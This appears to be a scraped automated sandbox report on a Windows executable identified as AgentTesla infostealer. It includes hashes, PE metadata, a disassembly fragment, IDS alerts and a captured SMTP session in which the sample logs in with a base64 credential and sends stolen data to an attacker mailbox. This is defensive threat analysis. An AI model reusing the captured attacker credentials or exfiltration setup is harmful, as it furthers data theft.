| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Amadey, LummaC Stealer, XWorm | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC, XWorm | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06
Download File
Process: | C:\Users\user\Desktop\D6yz87XjgM.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 50 |
Entropy (8bit): | 1.5212424590621707 |
Encrypted: | false |
SSDEEP: | 3:/lvlp:p |
MD5: | C851BF93667BDD6310D56581D955C2AE |
SHA1: | 8FC5AEC1542BD7471BF815632863622EFE23A834 |
SHA-256: | 3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D |
SHA-512: | D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
File type: | |
Entropy (8bit): | 6.4541856796164225 |
TrID: |
|
File name: | D6yz87XjgM.exe |
File size: | 1'653'512 bytes |
MD5: | eb180d9ac3c0ee0feb1b997ef3908f36 |
SHA1: | 17dcf2886e1dce74561ac12b4374b7d441f399b8 |
SHA256: | 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be |
SHA512: | 7afb7b99b23754e8edbee1d1ef2fad3191aac17e49eded473c3fe1a806607721717549bb7ffc131c6ab670c83bc8149a76de392b94d8d55cccb6c9296ab19f8c |
SSDEEP: | 49152:LbdYAm4zrbdYAm4zobdYAm4zvbdYAm4zdbdYAm4zZbdYAm4zgjT:Xdr3drCdrzdrddrRdrgX |
TLSH: | F1759D43724C57ADDAA30B31F63FC0A413259EBF56144B1B32CBFB2D19BA15B492A2C5 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...eg.g..........................................@..........................@......h...................................... |
Icon Hash: | 6ced8d96b2ace4b2 |
Entrypoint: | 0x57c3ae |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | |
Time Stamp: | 0x67076765 [Thu Oct 10 05:34:29 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e0e5cba487d80ef75c8cfd3e40cc6131 |
Signature Valid: | false |
Signature Issuer: | CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | D26432F60E2A3BBEB3537B78CB826828 |
Thumbprint SHA-1: | 71AB79E1C8FF155838C37A5299AE215C52BF6D1D |
Thumbprint SHA-256: | BCB22974DD56BFE9A9197D05C2D4B646F5BDF23B8BA2ACB8FD9DB1557245A407 |
Serial: | 7AE2B5021371F092A904B6FA |
Instruction |
---|
jmp 00007FCDA4BD6A6Eh |
add byte ptr [ebp-75h], dl |
in al, dx |
push ecx |
push ecx |
push 00401006h |
mov eax, dword ptr fs:[00000000h] |
push eax |
mov dword ptr fs:[00000000h], esp |
push 00000014h |
pop eax |
call 00007FCDA4BD6781h |
push ebx |
push esi |
push edi |
mov dword ptr [ebp-08h], esp |
mov dword ptr [ebp-04h], 0057E490h |
call 00007FCDA4D1FCEEh |
push 0057C3F7h |
jmp 00007FCDA4D51B5Bh |
lea ecx, dword ptr [ebp-20h] |
call 00007FCDA4BD696Ah |
ret |
ret |
lea esi, dword ptr [ebp-20h] |
mov edi, dword ptr [ebp+08h] |
movsd |
movsd |
movsd |
movsd |
mov eax, dword ptr [ebp+08h] |
mov ecx, dword ptr [ebp-10h] |
mov dword ptr fs:[00000000h], ecx |
pop edi |
pop esi |
pop ebx |
leave |
retn 0004h |
push ebp |
mov ebp, esp |
push ecx |
push ecx |
push 00401006h |
mov eax, dword ptr fs:[00000000h] |
push eax |
mov dword ptr fs:[00000000h], esp |
push 00000018h |
pop eax |
call 00007FCDA4BD6720h |
push ebx |
push esi |
push edi |
mov dword ptr [ebp-08h], esp |
mov dword ptr [ebp-04h], 0057E4A0h |
mov dword ptr [ebp-24h], 00000030h |
push 00000004h |
lea eax, dword ptr [ebp-24h] |
push eax |
push 00000022h |
push FFFFFFFFh |
call 00007FCDA4BE001Dh |
call 00007FCDA4BD685Ah |
push 0057C46Eh |
jmp 00007FCDA4D51B5Bh |
lea ecx, dword ptr [ebp-20h] |
call 00007FCDA4BD68F3h |
ret |
ret |
lea esi, dword ptr [ebp-20h] |
mov edi, dword ptr [ebp+08h] |
movsd |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17e51c | 0x3c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x183000 | 0x10b18 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x191000 | 0x2b08 | .rsrc |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x17e000 | 0x1e4 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x17c714 | 0x17d000 | 8255470300e1a49d0f64e4d18447a703 | False | 0.6001585312089895 | data | 6.503870538873717 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x17e000 | 0xd04 | 0x1000 | 8b49f51d5aecf86a97629e56d1bce9ae | False | 0.324462890625 | data | 4.396409590241252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x17f000 | 0x3d24 | 0x1000 | 620f0b67a91f7f74151bc5be745b7110 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x183000 | 0x10b18 | 0x11000 | b438a85e6b16962e124be0333a78acd7 | False | 0.08263442095588236 | data | 3.7430046353398554 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x1830e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 34556 x 34556 px/m | 0.07952797823258015 | ||
RT_GROUP_ICON | 0x193910 | 0x14 | data | 1.15 | ||
RT_VERSION | 0x193924 | 0x1f4 | data | German | Germany | 0.5 |
DLL | Import |
---|---|
KERNEL32.DLL | GetProcAddress, VirtualAlloc, GetModuleHandleW |
MSVBVM60.DLL | __vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaLineInputStr, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVargVarMove, __vbaVarZero, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, DllFunctionCall, __vbaVarOr, __vbaRedimPreserve, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaNew, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaVarLateMemCallLd, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
German | Germany |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:05:16.773977+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.7 | 49741 | TCP |
2024-11-05T16:06:01.795556+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.7 | 55627 | TCP |
2024-11-05T16:06:46.896832+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.7 | 49706 | 162.254.34.31 | 587 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 5, 2024 16:05:04.720576048 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:04.720626116 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:04.720705986 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:04.764120102 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:04.764157057 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.373469114 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.373564959 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:05.379415035 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:05.379445076 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.379707098 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.484930992 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:05.531333923 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.681911945 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.681977034 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.682143927 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:05.734992027 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:06.651954889 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:06.657038927 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:06.657151937 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.448519945 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.449330091 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.454313993 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.610507965 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.611438990 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.616348982 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.773389101 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.774463892 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.779706955 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.942066908 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.942506075 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.947351933 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:08.103552103 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:08.103756905 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:08.109263897 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.244976044 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.245137930 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.245445967 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.245486021 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.245628119 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.245657921 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.246100903 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.246134043 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.250422955 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.409636974 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.410505056 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.410572052 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.410609961 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.410625935 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.415962934 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.415972948 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.416086912 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.416096926 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.606158018 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.661096096 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:06:46.732836008 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:06:46.737782955 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:06:46.896697998 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:06:46.896831989 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:06:46.902301073 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:06:46.902365923 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 5, 2024 16:05:04.509944916 CET | 63854 | 53 | 192.168.2.7 | 1.1.1.1 |
Nov 5, 2024 16:05:04.709742069 CET | 53 | 63854 | 1.1.1.1 | 192.168.2.7 |
Nov 5, 2024 16:05:22.278187037 CET | 53 | 57486 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 5, 2024 16:05:04.509944916 CET | 192.168.2.7 | 1.1.1.1 | 0x677d | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 5, 2024 16:05:04.709742069 CET | 1.1.1.1 | 192.168.2.7 | 0x677d | No error (0) | 172.67.74.152 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:05:04.709742069 CET | 1.1.1.1 | 192.168.2.7 | 0x677d | No error (0) | 104.26.12.205 | A (IP address) | IN (0x0001) | false | ||
Nov 5, 2024 16:05:04.709742069 CET | 1.1.1.1 | 192.168.2.7 | 0x677d | No error (0) | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.7 | 49704 | 172.67.74.152 | 443 | 7908 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-05 15:05:05 UTC | 155 | OUT | |
2024-11-05 15:05:05 UTC | 399 | IN | |
2024-11-05 15:05:05 UTC | 14 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Nov 5, 2024 16:05:07.448519945 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 220 server1.educt.shop127.0.0.1 ESMTP Postfix |
Nov 5, 2024 16:05:07.449330091 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | EHLO 830021 |
Nov 5, 2024 16:05:07.610507965 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250-server1.educt.shop127.0.0.1 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING |
Nov 5, 2024 16:05:07.611438990 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A= |
Nov 5, 2024 16:05:07.773389101 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 334 UGFzc3dvcmQ6 |
Nov 5, 2024 16:05:07.942066908 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 235 2.7.0 Authentication successful |
Nov 5, 2024 16:05:07.942506075 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | MAIL FROM:<sendxsenses@vetrys.shop> |
Nov 5, 2024 16:05:08.103552103 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.0 Ok |
Nov 5, 2024 16:05:08.103756905 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | RCPT TO:<senses@vetrys.shop> |
Nov 5, 2024 16:05:09.244976044 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok |
Nov 5, 2024 16:05:09.245137930 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | DATA |
Nov 5, 2024 16:05:09.245445967 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok |
Nov 5, 2024 16:05:09.245628119 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok |
Nov 5, 2024 16:05:09.246100903 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.1.5 Ok |
Nov 5, 2024 16:05:09.409636974 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 354 End data with <CR><LF>.<CR><LF> |
Nov 5, 2024 16:05:09.410625935 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | . |
Nov 5, 2024 16:05:09.606158018 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 250 2.0.0 Ok: queued as 313B76F1DE |
Nov 5, 2024 16:06:46.732836008 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 | QUIT |
Nov 5, 2024 16:06:46.896697998 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 | 221 2.0.0 Bye |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 4 |
Start time: | 10:04:57 |
Start date: | 05/11/2024 |
Path: | C:\Users\user\Desktop\D6yz87XjgM.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'653'512 bytes |
MD5 hash: | EB180D9AC3C0EE0FEB1B997EF3908F36 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 7 |
Start time: | 10:05:02 |
Start date: | 05/11/2024 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x230000 |
File size: | 65'440 bytes |
MD5 hash: | 0D5DF43AF2916F47D00C1573797C1A13 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 10:05:02 |
Start date: | 05/11/2024 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb90000 |
File size: | 65'440 bytes |
MD5 hash: | 0D5DF43AF2916F47D00C1573797C1A13 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 22% |
Dynamic/Decrypted Code Coverage: | 9.4% |
Signature Coverage: | 6.5% |
Total number of Nodes: | 551 |
Total number of Limit Nodes: | 67 |
Graph
Function 02272B06 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 369nativethreadprocessCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02272B02 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 352nativeCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02272AF7 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 343nativeCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054A57F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153nativememoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054AF1D Relevance: 194.9, APIs: 108, Strings: 3, Instructions: 691librarymemoryloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C6E3 Relevance: 155.5, APIs: 103, Instructions: 974COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054E785 Relevance: 107.2, APIs: 59, Strings: 2, Instructions: 441memoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0057C62D Relevance: 105.7, APIs: 70, Instructions: 747COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054EE42 Relevance: 100.2, APIs: 56, Strings: 1, Instructions: 453memoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054D6DB Relevance: 55.9, APIs: 37, Instructions: 361COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054D40C Relevance: 39.2, APIs: 26, Instructions: 206COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0057C48C Relevance: 15.1, APIs: 10, Instructions: 114COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054AD9F Relevance: 4.5, APIs: 3, Instructions: 44COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054F3F4 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0057C3B4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054A7DA Relevance: 1.3, Strings: 1, Instructions: 32COMMON
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054AB35 Relevance: .0, Instructions: 42COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 022730D7 Relevance: .0, Instructions: 28COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054A84C Relevance: .0, Instructions: 7COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054A860 Relevance: .0, Instructions: 6COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02276A17 Relevance: .0, Instructions: 4COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 022768DC Relevance: .0, Instructions: 4COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0227690D Relevance: .0, Instructions: 4COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02276965 Relevance: .0, Instructions: 4COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02276C57 Relevance: .0, Instructions: 3COMMON
Memory Dump Source |
|
